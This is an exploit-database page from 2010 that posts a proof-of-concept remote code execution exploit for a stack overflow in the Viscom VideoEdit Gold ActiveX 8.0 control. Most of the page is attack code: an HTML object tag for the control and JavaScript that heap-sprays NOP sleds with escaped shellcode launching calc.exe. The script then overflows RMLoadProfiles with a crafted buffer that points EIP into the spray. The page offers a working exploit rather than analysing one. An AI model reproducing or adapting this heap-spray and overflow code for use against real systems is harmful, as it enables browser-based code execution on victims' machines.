[local exploits] - Viscom VideoEdit Gold ActiveX 8.0 Remote
Posted on 06 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit by Rew in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================================== Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit =============================================================== <!-- Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit Date: Dec 5, 2010 Author: Rew Email: rew [splat] leethax.info Link: http://www.viscomsoft.com/products/videoeditgold/index.html Version: 8.0.0.0 Tested on: WinXP - IE 6 CVE: NA (0day) Impact is relatively low due to object not marked safe for scripting. You'll need to change the default IE settings to let it run. This is a plain vanilla stack overflow. The file is... "%PROGRAMFILES%VideoEdit Gold ActiveX ControlVideoEdit.ocx" I'm not using the SEH but here's the offsets just for kicks if you're interested. [2311 junk] [ebp] [eip] [284 junk] [nseh] [seh] --> <object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object> <script> // Ctrl+C Ctrl+V, herpderp // calc.exe var shellcode = unescape( '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+ '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+ '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+ '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+ '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+ '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e' ); var nops = unescape('%u9090%u9090'); var headersize = 20; var slackspace = headersize + shellcode.length; while(nops.length < slackspace) { nops += nops; } var fillblock = nops.substring(0, slackspace); var block = nops.substring(0, nops.length - slackspace); while((block.length + slackspace) < 0x50000) { block = block + block + fillblock; } memory=new Array(); for(counter=0; counter<200; counter++){ memory[counter] = block + shellcode; } var bof = ''; while(bof.length < 2312){ bof += 'A'; } bof += 'BBBB'; // EBP bof += "x0cx0cx0cx0c"; // EIP document.getElementById('target').RMLoadProfiles( bof ); </script> # <a href='http://1337db.com/'>1337db.com</a> [2010-12-06]</pre></body></html>
